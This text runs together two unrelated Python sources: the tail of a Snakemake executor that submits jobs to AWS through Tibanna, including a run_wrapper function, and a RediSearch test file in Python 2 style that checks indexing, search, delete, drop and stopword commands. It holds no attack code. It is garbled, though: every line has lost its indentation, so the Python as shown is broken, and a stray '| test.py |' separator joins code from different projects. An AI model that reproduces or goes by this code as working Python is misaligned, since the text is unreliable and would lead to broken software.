logger.debug("job input is remote= " + ("true" if i.is_remote else "false"))
if hasattr(i.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if i.remote_object.provider.is_default else "false")
)
for o in job.expanded_output:
logger.debug("job output " + str(o))
logger.debug(
"job output is remote= " + ("true" if o.is_remote else "false")
)
if hasattr(o.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if o.remote_object.provider.is_default else "false")
)
file_prefix = (
"file:///data1/snakemake" # working dir inside snakemake container on VM
)
input_source = dict()
for ip in job.input:
ip_rel = self.adjust_filepath(ip)
input_source[os.path.join(file_prefix, ip_rel)] = "s3://" + ip
output_target = dict()
output_all = [eo for eo in job.expanded_output]
if job.log:
if isinstance(job.log, list):
output_all.extend([str(_) for _ in job.log])
else:
output_all.append(str(job.log))
if hasattr(job, "benchmark") and job.benchmark:
if isinstance(job.benchmark, list):
output_all.extend([str(_) for _ in job.benchmark])
else:
output_all.append(str(job.benchmark))
for op in output_all:
op_rel = self.adjust_filepath(op)
output_target[os.path.join(file_prefix, op_rel)] = "s3://" + op
# mem & cpu
mem = job.resources["mem_mb"] / 1024 if "mem_mb" in job.resources.keys() else 1
cpu = job.threads
# jobid, grouping, run_name
jobid = tibanna_core.create_jobid()
if job.is_group():
run_name = "snakemake-job-%s-group-%s" % (str(jobid), str(job.groupid))
else:
run_name = "snakemake-job-%s-rule-%s" % (str(jobid), str(job.rule))
# tibanna input
tibanna_config = {
"run_name": run_name,
"mem": mem,
"cpu": cpu,
"ebs_size": math.ceil(job.resources["disk_mb"] / 1024),
"log_bucket": self.s3_bucket,
}
logger.debug("additional tibanna config: " + str(self.tibanna_config))
if self.tibanna_config:
tibanna_config.update(self.tibanna_config)
tibanna_args = ec2_utils.Args(
output_S3_bucket=self.s3_bucket,
language="snakemake",
container_image=self.container_image,
input_files=input_source,
output_target=output_target,
input_env=self.envvars,
)
self.add_workflow_files(job, tibanna_args)
self.add_command(job, tibanna_args, tibanna_config)
tibanna_input = {
"jobid": jobid,
"config": tibanna_config,
"args": tibanna_args.as_dict(),
}
logger.debug(json.dumps(tibanna_input, indent=4))
return tibanna_input
def run(self, job, callback=None, submit_callback=None, error_callback=None):
logger.info("running job using Tibanna...")
from tibanna.core import API
super()._run(job)
# submit job here, and obtain job ids from the backend
tibanna_input = self.make_tibanna_input(job)
jobid = tibanna_input["jobid"]
exec_info = API().run_workflow(
tibanna_input,
sfn=self.tibanna_sfn,
verbose=not self.quiet,
jobid=jobid,
sleep=0,
)
exec_arn = exec_info.get("_tibanna", {}).get("exec_arn", "")
jobname = tibanna_input["config"]["run_name"]
jobid = tibanna_input["jobid"]
# register job as active, using your own namedtuple.
# The namedtuple must at least contain the attributes
# job, jobid, callback, error_callback.
self.active_jobs.append(
TibannaJob(job, jobname, jobid, exec_arn, callback, error_callback)
)
def _wait_for_jobs(self):
# busy wait on job completion
# This is only needed if your backend does not allow to use callbacks
# for obtaining job status.
from tibanna.core import API
while True:
# always use self.lock to avoid race conditions
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
# use self.status_rate_limiter to avoid too many API calls.
with self.status_rate_limiter:
if j.exec_arn:
status = API().check_status(j.exec_arn)
else:
status = "FAILED_AT_SUBMISSION"
if not self.quiet or status != "RUNNING":
logger.debug("job %s: %s" % (j.jobname, status))
if status == "RUNNING":
still_running.append(j)
elif status == "SUCCEEDED":
j.callback(j.job)
else:
j.error_callback(j.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
def run_wrapper(
job_rule,
input,
output,
params,
wildcards,
threads,
resources,
log,
benchmark,
benchmark_repeats,
conda_env,
container_img,
singularity_args,
env_modules,
use_singularity,
linemaps,
debug,
cleanup_scripts,
shadow_dir,
jobid,
edit_notebook,
):
"""
Wrapper around the run method that handles exceptions and benchmarking.
Arguments
job_rule -- the ``job.rule`` member
input -- list of input files
output -- list of output files
wildcards -- so far processed wildcards
threads -- usable threads
log -- list of log files
shadow_dir -- optional shadow directory root
"""
# get shortcuts to job_rule members
run = job_rule.run_func
version = job_rule.version
rule = job_rule.name
is_shell = job_rule.shellcmd is not None
if os.name == "posix" and debug:
sys.stdin = open("/dev/stdin")
if benchmark is not None:
from snakemake.benchmark import (
BenchmarkRecord,
benchmarked,
write_benchmark_records,
)
# Change workdir if shadow defined and not using singularity.
# Otherwise, we do the change from inside the container.
passed_shadow_dir = None
if use_singularity and container_img:
passed_shadow_dir = shadow_dir
shadow_dir = None
try:
with change_working_directory(shadow_dir):
if benchmark:
bench_records = []
for bench_iteration in range(benchmark_repeats):
# Determine whether to benchmark this process or do not
# benchmarking at all. We benchmark this process unless the
# execution is done through the ``shell:``, ``script:``, or
# ``wrapper:`` stanza.
is_sub = (
job_rule.shellcmd
or job_rule.script
or job_rule.wrapper
or job_rule.cwl
)
if is_sub:
# The benchmarking through ``benchmarked()`` is started
# in the execution of the shell fragment, script, wrapper
# etc, as the child PID is available there.
bench_record = BenchmarkRecord()
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
)
else:
# The benchmarking is started here as we have a run section
# and the generated Python function is executed in this
# process' thread.
with benchmarked() as bench_record:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
)
# Store benchmark record for this iteration
bench_records.append(bench_record)
else:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
None,
jobid,
is_shell,
None,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
)
except (KeyboardInterrupt, SystemExit) as e:
# Re-raise the keyboard interrupt in order to record an error in the
# scheduler but ignore it
raise e
except (Exception, BaseException) as ex:
log_verbose_traceback(ex)
# this ensures that exception can be re-raised in the parent thread
lineno, file = get_exception_origin(ex, linemaps)
raise RuleException(
format_error(
ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True
)
)
if benchmark is not None:
try:
write_benchmark_records(bench_records, benchmark)
except (Exception, BaseException) as ex:
raise WorkflowError(ex)
|
test.py
|
# -*- coding: utf-8 -*-
import redis
import unittest
from hotels import hotels
import random
import time
from RLTest import Env
from includes import *
from common import getConnectionByEnv, waitForIndex, toSortedFlatList
# this tests is not longer relevant
# def testAdd(env):
# if env.is_cluster():
# raise unittest.SkipTest()
# r = env
# env.assertOk(r.execute_command(
# 'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
# env.assertTrue(r.exists('idx:idx'))
# env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
# 'title', 'hello world',
# 'body', 'lorem ist ipsum'))
# for _ in r.retry_with_rdb_reload():
# prefix = 'ft'
# env.assertExists(prefix + ':idx/hello')
# env.assertExists(prefix + ':idx/world')
# env.assertExists(prefix + ':idx/lorem')
def testAddErrors(env):
env.expect('ft.create idx ON HASH schema foo text bar numeric sortable').equal('OK')
env.expect('ft.add idx doc1 1 redis 4').error().contains('Unknown keyword')
env.expect('ft.add idx doc1').error().contains("wrong number of arguments")
env.expect('ft.add idx doc1 42').error().contains("Score must be between 0 and 1")
env.expect('ft.add idx doc1 1.0').error().contains("No field list found")
env.expect('ft.add fake_idx doc1 1.0 fields foo bar').error().contains("Unknown index name")
def assertEqualIgnoreCluster(env, val1, val2):
# todo: each test that uses this function should be switch back to env.assertEqual once fix
# issues on coordinator
if env.isCluster():
return
env.assertEqual(val1, val2)
def testConditionalUpdate(env):
env.assertOk(env.cmd(
'ft.create', 'idx','ON', 'HASH',
'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1',
'fields', 'foo', 'hello', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '1 == 2', 'fields', 'foo', 'world', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'partial', 'if',
'@foo == "world"', 'fields', 'bar', '234'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@bar == 234', 'fields', 'foo', 'hello', 'bar', '123'))
# Ensure that conditionals are ignored if the document doesn't exist
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails if we try again, because it already exists
env.assertEqual('NOADD', env.cmd('FT.ADD', 'idx', '666', '1',
'REPLACE', 'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails because we're not using 'REPLACE'
with env.assertResponseError():
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
def testUnionIdList(env):
# Regression test for https://github.com/RediSearch/RediSearch/issues/306
r = env
N = 100
env.assertOk(r.execute_command(
"ft.create", "test", 'ON', 'HASH',
"SCHEMA", "tags", "TAG", "waypoint", "GEO"))
env.assertOk(r.execute_command(
"ft.add", "test", "1", "1", "FIELDS", "tags", "alberta", "waypoint", "-113.524,53.5244"))
env.assertOk(r.execute_command(
"ft.add", "test", "2", "1", "FIELDS", "tags", "ontario", "waypoint", "-79.395,43.661667"))
r.cmd('ft.search', 'test', '@tags:{ontario}')
res = r.execute_command(
'ft.search', 'test', "@waypoint:[-113.52 53.52 20 mi]|@tags:{ontario}", 'nocontent')
env.assertEqual(res, [2, '2', '1'])
def testAttributes(env):
env.assertOk(env.cmd('ft.create', 'idx','ON', 'HASH',
'schema', 'title', 'text', 'body', 'text'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 't1 t2', 'body', 't3 t4 t5'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'body', 't1 t2', 'title', 't3 t5'))
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 0.2}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 2.5}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc1', 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t3 t5) => {$slop: 4}', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0}', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0; $inorder:true}', 'nocontent')
env.assertListEqual([0], res)
def testUnion(env):
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx','ON', 'HASH', 'schema', 'f', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world' if i % 2 == 0 else 'hallo werld'))
for _ in r.retry_with_rdb_reload():
waitForIndex(r, 'idx')
res = r.execute_command(
'ft.search', 'idx', 'hello|hallo', 'nocontent', 'limit', '0', '100')
env.assertEqual(N + 1, len(res))
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello|world', 'nocontent', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command('ft.search', 'idx', '(hello|hello)(world|world)',
'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo)(werld|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hallo|hello)(world|werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|werld)(hallo|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo) world', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello world)|((hello world)|(hallo world|werld) | hello world werld)',
'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
def testSearch(env):
r = env
r.expect('ft.create', 'idx', 'ON', 'HASH',
'schema', 'title', 'text', 'weight', 10.0, 'body', 'text').ok()
r.expect('ft.add', 'idx', 'doc1', 0.5,
'fields','title', 'hello world', 'body', 'lorem ist ipsum').ok()
r.expect('ft.add', 'idx', 'doc2', 1.0,
'fields', 'title', 'hello another world', 'body', 'lorem ist ipsum lorem lorem').ok()
# order of documents might change after reload
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
res = r.execute_command('ft.search', 'idx', 'hello')
expected = [2L, 'doc2', ['title', 'hello another world', 'body', 'lorem ist ipsum lorem lorem'],
'doc1', ['title', 'hello world', 'body', 'lorem ist ipsum']]
env.assertEqual(toSortedFlatList(res), toSortedFlatList(expected))
# Test empty query
res = r.execute_command('ft.search', 'idx', '')
env.assertListEqual([0], res)
# Test searching with no content
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent')
env.assertTrue(len(res) == 3)
expected = ['doc2', 'doc1']
env.assertEqual(res[0], 2L)
for item in expected:
env.assertIn(item, res)
# Test searching WITHSCORES
res = r.execute_command('ft.search', 'idx', 'hello', 'WITHSCORES')
env.assertEqual(len(res), 7)
env.assertEqual(res[0], 2L)
for item in expected:
env.assertIn(item, res)
env.assertTrue(float(res[2]) > 0)
env.assertTrue(float(res[5]) > 0)
# Test searching WITHSCORES NOCONTENT
res = r.execute_command('ft.search', 'idx', 'hello', 'WITHSCORES', 'NOCONTENT')
env.assertEqual(len(res), 5)
env.assertEqual(res[0], 2L)
for item in expected:
env.assertIn(item, res)
env.assertTrue(float(res[2]) > 0)
env.assertTrue(float(res[4]) > 0)
def testGet(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH',
'schema', 'foo', 'text', 'bar', 'text'))
env.expect('ft.get').error().contains("wrong number of arguments")
env.expect('ft.get', 'idx').error().contains("wrong number of arguments")
env.expect('ft.get', 'idx', 'foo', 'bar').error().contains("wrong number of arguments")
env.expect('ft.mget').error().contains("wrong number of arguments")
env.expect('ft.mget', 'idx').error().contains("wrong number of arguments")
env.expect('ft.mget', 'fake_idx').error().contains("wrong number of arguments")
env.expect('ft.get fake_idx foo').error().contains("Unknown Index name")
env.expect('ft.mget fake_idx foo').error().contains("Unknown Index name")
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world', 'bar', 'wat wat'))
for i in range(100):
res = r.execute_command('ft.get', 'idx', 'doc%d' % i)
env.assertIsNotNone(res)
env.assertEqual(set(['foo', 'hello world', 'bar', 'wat wat']), set(res))
env.assertIsNone(r.execute_command(
'ft.get', 'idx', 'doc%dsdfsd' % i))
env.expect('ft.get', 'no_idx', 'doc0').error().contains("Unknown Index name")
rr = r.execute_command(
'ft.mget', 'idx', *('doc%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNotNone(res)
env.assertEqual(set(['foo', 'hello world', 'bar', 'wat wat']), set(res))
rr = r.execute_command(
'ft.mget', 'idx', *('doc-%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNone(res)
# Verify that when a document is deleted, GET returns NULL
r.cmd('ft.del', 'idx', 'doc10') # But we still keep the document
r.cmd('ft.del', 'idx', 'doc11')
assert r.cmd('ft.del', 'idx', 'coverage') == 0
res = r.cmd('ft.get', 'idx', 'doc10')
r.assertEqual(None, res)
res = r.cmd('ft.mget', 'idx', 'doc10')
r.assertEqual([None], res)
res = r.cmd('ft.mget', 'idx', 'doc10', 'doc11', 'doc12')
r.assertIsNone(res[0])
r.assertIsNone(res[1])
r.assertTrue(not not res[2])
env.expect('ft.add idx doc 0.1 language arabic payload redislabs fields foo foo').ok()
env.expect('ft.get idx doc').equal(['foo', 'foo'])
res = env.cmd('hgetall doc')
env.assertEqual(set(res), set(['foo', 'foo', '__score', '0.1', '__language', 'arabic', '__payload', 'redislabs']))
def testDelete(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'f', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
env.expect('ft.del', 'fake_idx', 'doc1').error()
for i in range(100):
# the doc hash should exist now
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
# Delete the actual docs only half of the time
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i, 'DD' if i % 2 == 0 else ''))
# second delete should return 0
env.assertEqual(0, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
# second delete should return 0
# TODO: return 0 if doc wasn't found
#env.assertEqual(0, r.execute_command(
# 'ft.del', 'idx', 'doc%d' % i))
# After del with DD the doc hash should not exist
if i % 2 == 0:
env.assertFalse(r.exists('doc%d' % i))
else:
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertNotIn('doc%d' % i, res)
env.assertEqual(res[0], 100 - i - 1)
env.assertEqual(len(res), 100 - i)
# test reinsertion
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertIn('doc%d' % i, res)
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
did = 'rrrr'
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
def testReplace(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'f', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(2, res[0])
with env.assertResponseError():
# make sure we can't insert a doc twice
res = r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world')
# now replace doc1 with a different content
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'replace', 'fields',
'f', 'goodbye universe'))
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
# make sure the query for hello world does not return the replaced
# document
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc2', res[1])
# search for the doc's new content
res = r.execute_command(
'ft.search', 'idx', 'goodbye universe', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
def testDrop(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
env.assertOk(r.execute_command('ft.drop', 'idx'))
keys = r.keys('*')
env.assertEqual(0, len(keys))
env.flush()
# Now do the same with KEEPDOCS
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH',
'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
if not env.is_cluster():
env.assertOk(r.execute_command('ft.drop', 'idx', 'KEEPDOCS'))
keys = r.keys('*')
env.assertListEqual(['doc0', 'doc1', 'doc10', 'doc11', 'doc12', 'doc13', 'doc14', 'doc15', 'doc16', 'doc17', 'doc18', 'doc19', 'doc2', 'doc20', 'doc21', 'doc22', 'doc23', 'doc24', 'doc25', 'doc26', 'doc27', 'doc28', 'doc29', 'doc3', 'doc30', 'doc31', 'doc32', 'doc33', 'doc34', 'doc35', 'doc36', 'doc37', 'doc38', 'doc39', 'doc4', 'doc40', 'doc41', 'doc42', 'doc43', 'doc44', 'doc45', 'doc46', 'doc47', 'doc48', 'doc49', 'doc5', 'doc50', 'doc51', 'doc52', 'doc53',
'doc54', 'doc55', 'doc56', 'doc57', 'doc58', 'doc59', 'doc6', 'doc60', 'doc61', 'doc62', 'doc63', 'doc64', 'doc65', 'doc66', 'doc67', 'doc68', 'doc69', 'doc7', 'doc70', 'doc71', 'doc72', 'doc73', 'doc74', 'doc75', 'doc76', 'doc77', 'doc78', 'doc79', 'doc8', 'doc80', 'doc81', 'doc82', 'doc83', 'doc84', 'doc85', 'doc86', 'doc87', 'doc88', 'doc89', 'doc9', 'doc90', 'doc91', 'doc92', 'doc93', 'doc94', 'doc95', 'doc96', 'doc97', 'doc98', 'doc99'], sorted(keys))
env.expect('FT.DROP', 'idx', 'KEEPDOCS', '666').error().contains("wrong number of arguments")
def testDelete(env):
r = env
r.expect('ft.create', 'idx', 'ON', 'HASH', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo').ok()
for i in range(100):
r.expect('ft.add', 'idx', 'doc%d' % i, 1.0,
'fields', 'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497').ok()
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
r.expect('FT.DROPINDEX', 'idx', 'dd').ok()
keys = r.keys('*')
env.assertEqual(0, len(keys))
env.flush()
# Now do the same with KEEPDOCS
env.expect('ft.create', 'idx', 'ON', 'HASH',
'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo').ok()
for i in range(100):
r.expect('ft.add', 'idx', 'doc%d' % i, 1.0,
'fields', 'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497').ok()
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
if not env.is_cluster():
r.expect('FT.DROPINDEX', 'idx').ok()
keys = r.keys('*')
env.assertListEqual(sorted("doc%d" %k for k in range(100)), sorted(keys))
env.expect('FT.DROPINDEX', 'idx', 'dd', '666').error().contains("wrong number of arguments")
def testCustomStopwords(env):
r = env
# Index with default stopwords
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text'))
# Index with custom stopwords
env.assertOk(r.execute_command('ft.create', 'idx2', 'ON', 'HASH', 'stopwords', 2, 'hello', 'world',
'schema', 'foo', 'text'))
if not env.isCluster:
res = env.cmd('ft.info', 'idx2')
env.assertEqual(res[39], ['hello', 'world'])
# Index with NO stopwords
env.assertOk(r.execute_command('ft.create', 'idx3', 'ON', 'HASH', 'stopwords', 0,
'schema', 'foo', 'text'))
if not env.isCluster:
res = env.cmd('ft.info', 'idx3')
env.assertEqual(res[39], [])
#for idx in ('idx', 'idx2', 'idx3'):
env.assertOk(r.execute_command(
'ft.add', 'idx', 'doc1', 1.0, 'fields', 'foo', 'hello world'))
env.assertOk(r.execute_command(
'ft.add', 'idx', 'doc2', 1.0, 'fields', 'foo', 'to be or not to be'))
for _ in r.retry_with_rdb_reload():
waitForIndex(r, 'idx')
# Normal index should return results just for 'hello world'
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent'))
env.assertEqual([0], r.execute_command(
'ft.search', 'idx', 'to be or not', 'nocontent'))
# Custom SW index should return results just for 'to be or not'
env.assertEqual([0], r.execute_command(
'ft.search', 'idx2', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx2', 'to be or not', 'nocontent'))
# No SW index should return results for both
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx3', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx3', 'to be or not', 'nocontent'))
def testStopwords(env):
# This test was taken from Python's tests, and failed due to some changes
# made earlier
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'stopwords', 3, 'foo',
'bar', 'baz', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'foo bar')
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields', 'txt', 'hello world')
r1 = env.cmd('ft.search', 'idx', 'foo bar', 'nocontent')
r2 = env.cmd('ft.search', 'idx', 'foo bar hello world', 'nocontent')
env.assertEqual(0, r1[0])
env.assertEqual(1, r2[0])
def testNoStopwords(env):
# This test taken from Java's test suite
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'title', 'text')
for i in range(100):
env.cmd('ft.add', 'idx', 'doc{}'.format(i), 1.0, 'fields',
'title', 'hello world' if i % 2 == 0 else 'hello worlds')
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOCONTENT')
env.assertEqual(100, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world',
'VERBATIM', 'NOCONTENT')
env.assertEqual(50, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOSTOPWORDS')
env.assertEqual(0, res[0])
def testOptional(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', 1.0, 'fields', 'foo', 'hello wat woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'foo', 'hello world woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'foo', 'hello world werld'))
res = r.execute_command('ft.search', 'idx', 'hello', 'nocontent')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([2L, 'doc3', 'doc2'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world ~werld', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', '~world ~werld hello', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
def testExplain(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH',
'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
q = '(hello world) "what what" hello|world @bar:[10 100]|@bar:[200 300]'
res = r.execute_command('ft.explain', 'idx', q)
# print res.replace('\n', '\\n')
# expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
# expected = """INTERSECT {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
env.assertEqual(res, expected)
